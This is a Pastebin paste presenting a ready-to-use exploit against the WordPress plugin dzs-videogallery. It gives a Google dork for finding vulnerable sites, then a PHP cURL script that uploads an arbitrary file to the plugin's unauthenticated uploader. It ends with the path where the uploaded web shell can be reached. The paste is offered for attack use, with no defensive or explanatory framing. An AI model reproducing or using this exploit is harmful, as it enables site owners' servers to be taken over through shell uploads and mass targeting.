Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Dork : inurl:/wp-content/plugins/dzs-videogallery/ site:org/uk/co/com/fr/net
- CSRF:
- <?php
- $uploadfile="";
- $ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('file_field'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch); curl_close($ch);
- print "$postResult";
- ?>
- Shell Acces : http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/yourshell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement